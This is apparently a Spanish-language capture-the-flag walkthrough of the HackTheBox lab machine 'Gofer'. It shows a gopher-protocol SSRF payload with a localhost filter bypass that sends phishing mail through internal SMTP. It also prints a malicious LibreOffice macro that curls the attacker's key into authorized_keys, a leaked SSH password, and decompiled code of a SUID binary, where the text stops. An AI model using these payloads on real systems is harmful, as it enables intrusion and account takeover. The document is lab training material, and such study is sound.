I"ä“
<h2 id="enumeracion">Enumeracion</h2>

<p>Iniciamos con un escaneo de nmap con:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">nmap</span> <span class="o">-</span><span class="n">sS</span> <span class="o">-</span><span class="n">n</span> <span class="o">-</span><span class="no">Pn</span> <span class="o">-</span><span class="no">T4</span> <span class="o">--</span><span class="nb">open</span> <span class="o">-</span><span class="nb">p</span><span class="o">-</span> <span class="mf">10.10</span><span class="o">.</span><span class="mf">11.225</span>
</code></pre></div></div>

<ul>
  <li>
    <p>sS: haga un TCP SYN Scan el cual hace que el destino responda con un RST si el puerto esta cerrado, o con un SYN/ACK si esta abierto, y ademas para que vaya mas rapido</p>
  </li>
  <li>
    <p>n: para que no haga resolucion DNS y tarde menos el escaneo</p>
  </li>
  <li>
    <p>Pn: para evitar el descubrimiento de hosts</p>
  </li>
  <li>
    <p>open: para que solo muestre los puertos abiertos</p>
  </li>
  <li>
    <p>-p-: para que escanee todo el rango de puertos</p>
  </li>
</ul>

<p>Y nos reporto que hay varios puertos abiertos:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">PORT</span>    <span class="no">STATE</span> <span class="no">SERVICE</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">ssh</span>
<span class="mi">80</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">http</span>
<span class="mi">139</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span>
<span class="mi">445</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">microsoft</span><span class="o">-</span><span class="n">ds</span>
</code></pre></div></div>

<p>Como curiosodad, es que si le quitamos el <strong>‚Äìopen</strong>, nos saldra el puerto del SMTP, eso de debe a que nmap regularmente te puede reportar los 
puertos como abiertos, cerrados, y filtrados</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">25</span><span class="o">/</span><span class="n">tcp</span>  <span class="n">filtered</span> <span class="n">smtp</span>
</code></pre></div></div>

<p>Ahora escanearemos para obtener mas informacion sobre la version y el servicio que estan corriendo bajo esos puertos:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">nmap</span> <span class="o">-</span><span class="n">sCV</span> <span class="o">-</span><span class="n">p22</span><span class="p">,</span><span class="mi">25</span><span class="p">,</span><span class="mi">80</span><span class="p">,</span><span class="mi">139</span><span class="p">,</span><span class="mi">445</span> <span class="mf">10.10</span><span class="o">.</span><span class="mf">11.225</span>
</code></pre></div></div>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">PORT</span>    <span class="no">STATE</span>    <span class="no">SERVICE</span>     <span class="no">VERSION</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>     <span class="n">ssh</span>         <span class="no">OpenSSH</span> <span class="mf">8.4</span><span class="n">p1</span> <span class="no">Debian</span> <span class="mi">5</span><span class="o">+</span><span class="n">deb11u1</span> <span class="p">(</span><span class="n">protocol</span> <span class="mf">2.0</span><span class="p">)</span>
<span class="o">|</span> <span class="n">ssh</span><span class="o">-</span><span class="ss">hostkey: 
</span><span class="o">|</span>   <span class="mi">3072</span> <span class="n">aa</span><span class="p">:</span><span class="mi">25</span><span class="p">:</span><span class="mi">82</span><span class="p">:</span><span class="mi">6</span><span class="n">e</span><span class="ss">:b8</span><span class="p">:</span><span class="mo">04</span><span class="ss">:b6:a9:a9</span><span class="p">:</span><span class="mi">5</span><span class="n">e</span><span class="p">:</span><span class="mi">1</span><span class="n">a</span><span class="p">:</span><span class="mi">91</span><span class="ss">:f0</span><span class="p">:</span><span class="mi">94</span><span class="p">:</span><span class="mi">51</span><span class="ss">:dd</span> <span class="p">(</span><span class="no">RSA</span><span class="p">)</span>
<span class="o">|</span>   <span class="mi">256</span> <span class="mi">18</span><span class="p">:</span><span class="mi">21</span><span class="ss">:ba:a7:dc:e4</span><span class="p">:</span><span class="mi">4</span><span class="n">f</span><span class="p">:</span><span class="mi">60</span><span class="ss">:d7</span><span class="p">:</span><span class="mi">81</span><span class="p">:</span><span class="mo">03</span><span class="p">:</span><span class="mi">9</span><span class="n">a</span><span class="p">:</span><span class="mi">5</span><span class="n">d</span><span class="ss">:c2:e5</span><span class="p">:</span><span class="mi">96</span> <span class="p">(</span><span class="no">ECDSA</span><span class="p">)</span>
<span class="o">|</span><span class="n">_</span>  <span class="mi">256</span> <span class="n">a4</span><span class="p">:</span><span class="mi">2</span><span class="n">d</span><span class="p">:</span><span class="mi">0</span><span class="n">d</span><span class="p">:</span><span class="mi">45</span><span class="p">:</span><span class="mi">13</span><span class="p">:</span><span class="mi">2</span><span class="n">a</span><span class="p">:</span><span class="mi">9</span><span class="n">e</span><span class="p">:</span><span class="mi">7</span><span class="n">f</span><span class="p">:</span><span class="mi">86</span><span class="p">:</span><span class="mi">7</span><span class="n">a</span><span class="ss">:f6:f7</span><span class="p">:</span><span class="mi">78</span><span class="ss">:bc</span><span class="p">:</span><span class="mi">42</span><span class="ss">:d9</span> <span class="p">(</span><span class="no">ED25519</span><span class="p">)</span>
<span class="mi">25</span><span class="o">/</span><span class="n">tcp</span>  <span class="n">filtered</span> <span class="n">smtp</span>
<span class="mi">80</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>     <span class="n">http</span>        <span class="no">Apache</span> <span class="n">httpd</span> <span class="mf">2.4</span><span class="o">.</span><span class="mi">56</span>
<span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">server</span><span class="o">-</span><span class="ss">header: </span><span class="no">Apache</span><span class="o">/</span><span class="mf">2.4</span><span class="o">.</span><span class="mi">56</span> <span class="p">(</span><span class="no">Debian</span><span class="p">)</span>
<span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="ss">title: </span><span class="no">Did</span> <span class="n">not</span> <span class="n">follow</span> <span class="n">redirect</span> <span class="n">to</span> <span class="n">http</span><span class="ss">:/</span><span class="o">/</span><span class="n">gofer</span><span class="p">.</span><span class="nf">htb</span><span class="o">/</span>
<span class="mi">139</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>     <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span> <span class="no">Samba</span> <span class="n">smbd</span> <span class="mf">4.6</span><span class="o">.</span><span class="mi">2</span>
<span class="mi">445</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>     <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span> <span class="no">Samba</span> <span class="n">smbd</span> <span class="mf">4.6</span><span class="o">.</span><span class="mi">2</span>
<span class="no">Service</span> <span class="no">Info</span><span class="p">:</span> <span class="no">Host</span><span class="p">:</span> <span class="n">gofer</span><span class="p">.</span><span class="nf">htb</span><span class="p">;</span> <span class="no">OS</span><span class="p">:</span> <span class="no">Linux</span><span class="p">;</span> <span class="no">CPE</span><span class="p">:</span> <span class="n">cpe</span><span class="ss">:/</span><span class="n">o</span><span class="ss">:linux:linux_kernel</span>

<span class="no">Host</span> <span class="n">script</span> <span class="ss">results:
</span><span class="o">|</span> <span class="n">smb2</span><span class="o">-</span><span class="ss">time: 
</span><span class="o">|</span>   <span class="ss">date: </span><span class="mi">2023</span><span class="o">-</span><span class="mi">09</span><span class="o">-</span><span class="mi">16</span><span class="no">T14</span><span class="p">:</span><span class="mi">41</span><span class="p">:</span><span class="mi">45</span>
<span class="o">|</span><span class="n">_</span>  <span class="ss">start_date: </span><span class="no">N</span><span class="o">/</span><span class="no">A</span>
<span class="o">|</span><span class="ss">_nbstat: </span><span class="no">NetBIOS</span> <span class="ss">name: </span><span class="no">GOFER</span><span class="p">,</span> <span class="no">NetBIOS</span> <span class="ss">user: </span><span class="o">&lt;</span><span class="n">unknown</span><span class="o">&gt;</span><span class="p">,</span> <span class="no">NetBIOS</span> <span class="no">MAC</span><span class="p">:</span> <span class="o">&lt;</span><span class="n">unknown</span><span class="o">&gt;</span> <span class="p">(</span><span class="n">unknown</span><span class="p">)</span>
<span class="o">|</span><span class="n">_clock</span><span class="o">-</span><span class="ss">skew: </span><span class="o">-</span><span class="mi">12</span><span class="n">s</span>
<span class="o">|</span> <span class="n">smb2</span><span class="o">-</span><span class="n">security</span><span class="o">-</span><span class="ss">mode: 
</span><span class="o">|</span>   <span class="mi">3</span><span class="p">:</span><span class="mi">1</span><span class="p">:</span><span class="mi">1</span><span class="p">:</span> 
<span class="o">|</span><span class="n">_</span>    <span class="no">Message</span> <span class="n">signing</span> <span class="n">enabled</span> <span class="n">but</span> <span class="n">not</span> <span class="n">required</span>
</code></pre></div></div>

<ul>
  <li><strong>SSH:</strong> No podemos hacer nada interesante</li>
  <li><strong>SMTP:</strong> Tampoco es de interes, aun</li>
  <li><strong>HTTP:</strong> Vemos usa apache como servidor web, ademeas que nos redirige a <strong>gofer.htb</strong> (hay que agregarlo al /etc/hosts)</li>
  <li><strong>SMB/NetBIOS</strong>: Vemos que uno de los scripts que lanzo nmap es <strong>_nbstat</strong>, nos dice que el nombre del dominio de NetBIOS es <strong>GOFER</strong>, tambien nos dice que esta firmado pero no es requerido, eso es un indicio de que podriamos hacer ataques NTML relay (SMB relay attack para SMB), no necesario en esta maquina</li>
</ul>

<h3 id="enumeracion-smb">Enumeracion SMB</h3>

<p>Usare <strong>crackmapexec</strong> haciendo uso de un null session par enumerar recursos compartidos por SMB:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">crackmapexec</span> <span class="n">smb</span> <span class="n">gofer</span><span class="p">.</span><span class="nf">htb</span> <span class="o">-</span><span class="n">u</span> <span class="s1">''</span> <span class="o">-</span><span class="nb">p</span> <span class="s1">''</span> <span class="o">--</span><span class="n">shares</span>
</code></pre></div></div>

<p><img src="/assets/img/gofer/1.png" alt="" /></p>

<p>Vemos que solo en el recurso <strong>shares</strong> tenemos permisos, y son de lectura</p>

<p>Me conectare con <strong>smbclient</strong> para explorar ese recurso, tambien pueden usar <strong>smbmap</strong></p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">smbclient</span> <span class="sr">//</span><span class="n">gofer</span><span class="p">.</span><span class="nf">htb</span><span class="o">/</span><span class="n">shares</span> <span class="o">-</span><span class="no">N</span>
</code></pre></div></div>

<p>Lo unico que encontraremos es un directorios y un archivo con el nombre de <strong>mail</strong></p>

<p><img src="/assets/img/gofer/2.png" alt="" /></p>

<p>Haciendo uso de <strong>get mail</strong> lo descargamos</p>

<h3 id="analisis-del-correo">Analisis del correo</h3>

<p>Veremos que es un correo que si lo traducimos al espa√±ol seria:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Hola chicos

Nuestra querida Jocelyn recibi√≥ otro intento de phishing la semana pasada y su costumbre de hacer clic en los enlaces sin prestar mucha atenci√≥n puede ser problem√°tica alg√∫n d√≠a. Por eso, a partir de ahora, he decidido que los documentos importantes s√≥lo se env√≠en internamente, por correo, lo que deber√≠a limitar mucho los riesgos. Si es posible, utilice un formato .odt, ya que los documentos guardados en Office Word no siempre son bien interpretados por Libreoffice.

PD: Una √∫ltima cosa para Tom; s√© que est√°s trabajando en nuestro proxy web, pero si pudieras restringir el acceso, ser√≠a m√°s seguro hasta que lo hayas terminado. Me parece que deber√≠a ser posible hacerlo a trav√©s de &lt;Limit&gt;
</code></pre></div></div>

<ol>
  <li>
    <p>Nos dice que <strong>Jocelyn</strong> recibe correos phishing y les da click. En algunas maquinas se ha visto eso de que el usuario ‚Äúinteractua‚Äù con un enlace, etc, y pasan cosas tensas</p>
  </li>
  <li>
    <p>Tambien nos dice que los correos se utilizara el fomato .odt para cosas importantes</p>
  </li>
  <li>
    <p>Por ultimo nos dice que se usara un proxy web</p>
  </li>
</ol>

<p>Asi que tenemos una interaccion del usuario al dale clicks a enlaces, que los correos usan .odt para que los interprete LibreOficce</p>

<p><strong>Extra:</strong> Solamente con ver el nombre de <strong>Gofer</strong> por todos lados hasta en el nombre de la maquina, me puedo dar una idea de que la maquina este usando el protocolo <strong>Gopher</strong>, y ese mismo protocolo se ha explotado en otras maquinas usando <strong>SSRF</strong>, asi que hay cosillas jiji</p>

<p>Si analizamos la parte de encabezados:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From jdavis@gofer.htb  Fri Oct 28 20:29:30 2022
Return-Path: &lt;jdavis@gofer.htb&gt;
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
        by gofer.htb (Postfix) with SMTP id C8F7461827
        for &lt;tbuckley@gofer.htb&gt;; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: &lt;20221028192857.C8F7461827@gofer.htb&gt;
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb
</code></pre></div></div>

<p>Nos dice que el correo fue enviado por <strong>jdavis</strong> para el destinatario <strong>tbuckley</strong> (posiblemente usuarios validos), en el <strong>received</strong> que basicamente es el servidor que envio o retransmitio el correo fue <strong>Postfix</strong> desde localhost</p>

<h3 id="fuzzing-de-directorios-y-subdominios">Fuzzing de directorios y subdominios</h3>

<p>Podemos usar <strong>wffuzz</strong> para enumerar directorios mediante fuerza bruta:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wfuzz</span> <span class="o">-</span><span class="n">u</span> <span class="s1">'http://gofer.htb/FUZZ'</span> <span class="o">-</span><span class="n">w</span> <span class="sr">/usr/s</span><span class="n">hare</span><span class="o">/</span><span class="n">wordlists</span><span class="o">/</span><span class="n">directory</span><span class="o">-</span><span class="n">list</span><span class="o">-</span><span class="mf">2.3</span><span class="o">-</span><span class="n">medium</span><span class="p">.</span><span class="nf">txt</span> <span class="o">-</span><span class="n">t</span> <span class="mi">100</span> <span class="o">--</span><span class="n">hc</span><span class="o">=</span><span class="mi">404</span>
</code></pre></div></div>

<p>Pero no encontraremos nada interesante, mas que puros assets, asi que probaremos con subdominios</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wfuzz</span> <span class="o">-</span><span class="n">u</span> <span class="s1">'10.10.11.225'</span> <span class="o">-</span><span class="no">H</span> <span class="s1">'Host: FUZZ.gofer.htb'</span> <span class="o">-</span><span class="n">t</span> <span class="mi">100</span> <span class="o">-</span><span class="n">w</span> <span class="sr">/usr/s</span><span class="n">hare</span><span class="o">/</span><span class="n">wordlists</span><span class="o">/</span><span class="n">subdomains</span><span class="o">-</span><span class="n">top1million</span><span class="o">-</span><span class="mi">20000</span><span class="p">.</span><span class="nf">txt</span> <span class="o">--</span><span class="n">hw</span><span class="o">=</span><span class="mi">290</span>
</code></pre></div></div>

<p>Pero saldra puro 301, si pribamos con <strong>ffuf</strong>, descubriremos <strong>proxy.gofer.htb</strong></p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ffuf</span> <span class="o">-</span><span class="n">w</span> <span class="sr">/usr/s</span><span class="n">hare</span><span class="o">/</span><span class="n">wordlists</span><span class="o">/</span><span class="n">subdomains</span><span class="o">-</span><span class="n">top1million</span><span class="o">-</span><span class="mi">110000</span><span class="p">.</span><span class="nf">txt</span> <span class="o">-</span><span class="no">H</span> <span class="s2">"Host: FUZZ.gofer.htb"</span> <span class="o">-</span><span class="n">u</span> <span class="n">http</span><span class="ss">:/</span><span class="o">/</span><span class="n">gofer</span><span class="p">.</span><span class="nf">htb</span><span class="o">/</span> <span class="o">-</span><span class="n">fl</span> <span class="mi">10</span>
</code></pre></div></div>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span> <span class="no">FUZZ</span><span class="p">:</span> <span class="n">proxy</span>
</code></pre></div></div>

<h3 id="analisis-proxygoferhtb">Analisis proxy.gofer.htb</h3>

<p>Lo primero que tenemos al iniciar es una ventana como popup de un login, si probamos con contrase√±as por defecto o intentar un SQLi, no va a ser posible</p>

<p><img src="/assets/img/gofer/4.png" alt="" /></p>

<p>Interceptare la peticion por burp para ver mas a detalle:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">GET</span> <span class="o">/</span> <span class="no">HTTP</span><span class="o">/</span><span class="mf">1.1</span>
<span class="no">Host</span><span class="p">:</span> <span class="n">proxy</span><span class="p">.</span><span class="nf">gofer</span><span class="p">.</span><span class="nf">htb</span>
<span class="no">User</span><span class="o">-</span><span class="no">Agent</span><span class="p">:</span> <span class="no">Mozilla</span><span class="o">/</span><span class="mf">5.0</span> <span class="p">(</span><span class="no">X11</span><span class="p">;</span> <span class="no">Linux</span> <span class="n">x86_64</span><span class="p">;</span> <span class="n">rv</span><span class="p">:</span><span class="mf">109.0</span><span class="p">)</span> <span class="no">Gecko</span><span class="o">/</span><span class="mi">20100101</span> <span class="no">Firefox</span><span class="o">/</span><span class="mf">113.0</span>
<span class="no">Accept</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span><span class="p">,</span><span class="n">application</span><span class="o">/</span><span class="n">xhtml</span><span class="o">+</span><span class="n">xml</span><span class="p">,</span><span class="n">application</span><span class="o">/</span><span class="n">xml</span><span class="p">;</span><span class="n">q</span><span class="o">=</span><span class="mf">0.9</span><span class="p">,</span><span class="n">image</span><span class="o">/</span><span class="n">avif</span><span class="p">,</span><span class="n">image</span><span class="o">/</span><span class="n">webp</span><span class="p">,</span><span class="o">*</span><span class="sr">/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46YWRtaW4=
</span></code></pre></div></div>

<p>Solamente podemos ver que hace una peticion por GET y poco mas, como curiosidad, el encabezado de <strong>Auhorization</strong> nos dice que tipo de autenticacion esta usando, que en esta caso es <strong>HTTP Basic Authentication</strong> y la cadena en b64 son las credenciales que proporcione, y del lado de la respuesta solo es un 401.</p>

<p>Aqui se me ocurrio volver a hacer fuzzing de directorios pero en <strong>proxy.gofer.htb</strong> y no encontre nada</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wfuzz</span> <span class="o">-</span><span class="n">u</span> <span class="s1">'http://proxy.gofer.htb/FUZZ'</span> <span class="o">-</span><span class="n">w</span> <span class="sr">/usr/s</span><span class="n">hare</span><span class="o">/</span><span class="n">wordlists</span><span class="o">/</span><span class="n">directory</span><span class="o">-</span><span class="n">list</span><span class="o">-</span><span class="mf">2.3</span><span class="o">-</span><span class="n">medium</span><span class="p">.</span><span class="nf">txt</span> <span class="o">-</span><span class="n">t</span> <span class="mi">100</span> <span class="o">--</span><span class="n">hc</span><span class="o">=</span><span class="mi">404</span>
</code></pre></div></div>

<p>Etonces probe buscando por archivos con extensiones .php, pero tampoco encontre nada, asi que se me ocurrio en lugar de usar GET, usar POST para buscar archivos php</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wfuzz</span> <span class="o">-</span><span class="n">u</span> <span class="s1">'http://proxy.gofer.htb/FUZZ.php'</span> <span class="o">-</span><span class="n">w</span> <span class="sr">/usr/s</span><span class="n">hare</span><span class="o">/</span><span class="n">wordlists</span><span class="o">/</span><span class="n">directory</span><span class="o">-</span><span class="n">list</span><span class="o">-</span><span class="mf">2.3</span><span class="o">-</span><span class="n">medium</span><span class="p">.</span><span class="nf">txt</span> <span class="o">-</span><span class="n">t</span> <span class="mi">100</span> <span class="o">--</span><span class="n">hc</span><span class="o">=</span><span class="mi">404</span> <span class="o">-</span><span class="no">X</span> <span class="no">POST</span>
</code></pre></div></div>
<p>Y encontre un index.php</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">200</span>        <span class="mi">1</span> <span class="no">L</span>      <span class="mi">10</span> <span class="no">W</span>       <span class="mi">81</span> <span class="no">Ch</span>       <span class="s2">"index"</span>
</code></pre></div></div>

<p>Volvi a interceptar la peticion con burp para anlizarla</p>

<p><img src="/assets/img/gofer/5.png" alt="" /></p>

<p>Observa que de lado de la peticion que le puse el POST y en la respuesta sale <strong>HTTP/1.1 200 OK</strong> y en el contenido dice que falta el parametro URL: <strong>Missing URL parameter !</strong>, por intuicion, el nombre del parametro ya es un indicio de <strong>SSRF</strong>, ahora el URL le pasare la direccion de localhost y vean la respuesta</p>

<p><img src="/assets/img/gofer/6.png" alt="" /></p>

<p>La peticion se realizo y en la respuesta tenemos que es el sitio web de gofer.htb pero ese sitio web esta internamente en la maquina (127.0.0.1), lo que nos abre una posibilidad a un <strong>SSRF</strong></p>

<h2 id="ssrf-access-smtp-y-flag-de-user">SSRF access SMTP y flag de user</h2>

<p><strong>SSRF</strong>: Server-side request forgery es una vulnerabilidad que permite a los atancantes realizar peticiones arbitrarias con el fin de acceder a servicios internos de la maquina, o hacer peticiones a servidores externos de la maquina.</p>

<p>Entonces, recapitulando desde el inicio, tenemos que <strong>Jocelyn</strong> hace click a los enlaces, un servicio <strong>SMTP</strong> interno, correos en formato <strong>.odt</strong>, el protocolo <strong>Gopher</strong>, un <strong>SSRF</strong>, y que en otras maquina se puede explotar el protocolo <strong>Gopher</strong> via  <strong>SSRF</strong>. Si‚Ä¶ Todo se esta uniendo jijiji</p>

<p>Para realizar peticiones con Gopher se hace de la siguiente manera: <strong>gopher://</strong>, asi que realizaremos la peticion de esta manera: <strong>/index.php?url=gopher://127.0.0.1</strong></p>

<p><img src="/assets/img/gofer/7.png" alt="" /></p>

<p>Observa como nos bloquea el 127, pero no es problema, <a href="https://www.thehacker.recipes/web/inputs/ssrf#bypassing-filters">TheHacker Recipes</a> nos da unas formas de hacerle bypass</p>

<p>Si ahora realizamos la peticion de esta menera: <strong>/index.php?url=gopher://0x7f000001</strong> ya no veremos que nos bloquea el 127, para hacer unas cuantas pruebas, podemos hacer uso de <a href="https://github.com/tarunkant/Gopherus">Gopherus</a>, me guiare de <a href="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#gopher">HackTricks</a> y de <a href="https://infosecwriteups.com/server-side-request-forgery-to-internal-smtp-access-dea16fe37ed2">aca</a>, pero tomando en cuenta que los correos los envia <strong>jdavis</strong> (jdavis@gofer.htb) y los recibe <strong>Jocelyn</strong> (jhudson@gofer.htb)</p>

<p>El payload es:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gopher://0x7f000001:25/_HELO gofer.htb%0AMAIL FROM: &lt;jdavis@gofer.htb&gt;%0ARCPT TO: &lt;jhudson@gofer.htb&gt;%0ADATA%0ASubject: &lt;a http://10.10.14.59:8086/prueba&gt; SSRF HERE%0ASSRF AND SMTP%0A.
</code></pre></div></div>

<p>Y lo que estaria pasando es que mediante el <strong>SSRF</strong> estamos accediendo al servicio interno de <strong>SMTP</strong> para enviar un correo a la <strong>Jocelyn</strong>, y como sabemos que la <strong>Jocelyn</strong> da click en los enlaces, en el <strong>Subject</strong> agregamos nuestra IP con un archivo de <strong>/prueba</strong> que sera solicitado.</p>

<p>Y observa como nos llego una peticion que viene de la maquina hac√≠a el recurso /prueba</p>

<p><img src="/assets/img/gofer/8.png" alt="" /></p>

<p>Y ahora la pregunta es: ¬øComo conseguimos una reverse shell? o ¬øComo conseguimos RCE?, pues en el correo que vimos al principio, decia que los correos importantes se deberian de enviar con formato <strong>.odt</strong>, osea el formato por defecto de <strong>libreoffice</strong>, y ese archivo seria interpretado, pues bien, lo que podemos hacer es que crear un archivo <strong>.odt</strong> con una macro, la cual nos establezca una conexion al abrir el <strong>.odt</strong></p>

<p>Para crear un .odt malicioso pueden guiarse de aqui: <a href="https://jamesonhacking.blogspot.com/2022/03/using-malicious-libreoffice-calc-macros.html">https://jamesonhacking.blogspot.com/2022/03/using-malicious-libreoffice-calc-macros.html</a></p>

<p>En mi caso creare esta macro ya que el tipico oneliner de bash no me funciono, muchas gracias a <strong><a href="https://www.youtube.com/@xD4nt3">xD4nt3</a></strong> por la ayuda con la macro:</p>

<div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Sub</span> <span class="nf">Main</span>
    <span class="n">Shell</span><span class="p">(</span><span class="s">"curl &lt;tu_ip&gt;:8086/id_rsa.pub -o /home/jhudson/.ssh/authorized_keys"</span><span class="p">)</span>
<span class="k">End</span> <span class="k">Sub</span>
</code></pre></div></div>

<p>Simplemente modificamos el exploit que usamos anteriormente y en lugar de que se solicit√© <strong>/prueba</strong>, se solicitar√° ese .odt malicioso (/shell.odt, por ejemplo)</p>

<p>Pasando un momento, nos llegara una peticion a nuestro servidor web de python solicitando el archivo .odt, y ahora ya podemos acceder como <strong>jhudson</strong> por SSH, por que nuestro <strong>id_rsa.pub</strong> se hizo el <strong>authorized_keys</strong> de <strong>jhudson</strong></p>

<p><img src="/assets/img/gofer/9.png" alt="" /></p>

<h2 id="moviento-laterial-jhudson--tbuckley">Moviento laterial: jhudson ‚Äì&gt; tbuckley</h2>

<p>Podriamos a empezar a enumerar por binarios SUID, permisos de nivel de sudoers, capabilities, etc, etc, pero no va por ahi, en este punto decidi usar <strong>pspy64</strong> para ver si hay algun proceso interesante, asi que me pase el binario a la maquina victima</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">python3</span> <span class="o">-</span><span class="n">m</span> <span class="n">http</span><span class="p">.</span><span class="nf">server</span> <span class="mi">8086</span> <span class="o">--&gt;</span> <span class="n">maquina</span> <span class="n">atacante</span>
<span class="n">wget</span> <span class="o">&lt;</span><span class="n">tu_IP</span><span class="o">&gt;</span><span class="p">:</span><span class="mi">8086</span><span class="o">/</span><span class="n">pspy64</span> <span class="o">--&gt;</span> <span class="n">maquina</span> <span class="n">victima</span>
</code></pre></div></div>

<p>Viendo los resultados, nos damos cuenta que hay un proceso de un script que envia una peticion con curl a <strong>proxy.gofer.htb</strong> y hay unas credenciales</p>

<p><img src="/assets/img/gofer/10.png" alt="" /></p>

<p>usr: <strong>tbuckley</strong></p>

<p>pass: <strong>ooP4dietie3o_hquaeti</strong></p>

<p>Si las probamos por SSH, son validas</p>

<p><img src="/assets/img/gofer/11.png" alt="" /></p>

<p>Y ya somos <strong>tbuckley</strong></p>

<h2 id="escalada-de-privilegios-use-after-free--path-hijacking">Escalada de privilegios (Use-After-Free + PATH hijacking)</h2>

<p>Si buscamos por binarios SUID, encontraremos uno que se llama <strong>notes</strong>:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">find</span> <span class="o">/</span> <span class="o">-</span><span class="n">perm</span> <span class="o">-</span><span class="n">u</span><span class="o">=</span><span class="n">s</span> <span class="o">-</span><span class="n">type</span> <span class="n">f</span> <span class="mi">2</span><span class="o">&gt;</span><span class="sr">/dev/nu</span><span class="n">ll</span>
</code></pre></div></div>

<p><img src="/assets/img/gofer/12.png" alt="" /></p>

<p>Si vemos el tipo de archivo, nos sale que es un binario ELF, asi que me lo pasare a mi maquina para anlizarlo con ghidra:</p>

<h4 id="codigo-completo">Codigo completo</h4>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>

<span class="p">{</span>
  <span class="n">__uid_t</span> <span class="n">_Var1</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">iVar2</span><span class="p">;</span>
  <span class="n">undefined4</span> <span class="n">local_1c</span><span class="p">;</span>
  <span class="kt">void</span> <span class="o">*</span><span class="n">local_18</span><span class="p">;</span>
  <span class="kt">void</span> <span class="o">*</span><span class="n">local_10</span><span class="p">;</span>
  
  <span class="n">local_1c</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">local_10</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
  <span class="n">local_18</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
  <span class="k">do</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span>
        <span class="s">"========================================</span><span class="se">\n</span><span class="s">1) Create an user and choose an username</span><span class="se">\n</span><span class="s">2) Show  user information</span><span class="se">\n</span><span class="s">3) Delete an user</span><span class="se">\n</span><span class="s">4) Write a note</span><span class="se">\n</span><span class="s">5) Show a note</span><span class="se">\n</span><span class="s">6) Save a note (not y et implemented)</span><span class="se">\n</span><span class="s">7) Delete a note</span><span class="se">\n</span><span class="s">8) Backup notes</span><span class="se">\n</span><span class="s">9) Quit</span><span class="se">\n</span><span class="s">=============================== =========</span><span class="se">\n\n</span><span class="s">"</span>
        <span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Your choice: "</span><span class="p">);</span>
    <span class="n">__isoc99_scanf</span><span class="p">(</span><span class="o">&amp;</span><span class="n">DAT_0010212b</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_1c</span><span class="p">);</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">""</span><span class="p">);</span>
    <span class="k">switch</span><span class="p">(</span><span class="n">local_1c</span><span class="p">)</span> <span class="p">{</span>
    <span class="nl">default:</span>
                    <span class="cm">/* WARNING: Subroutine does not return */</span>
      <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
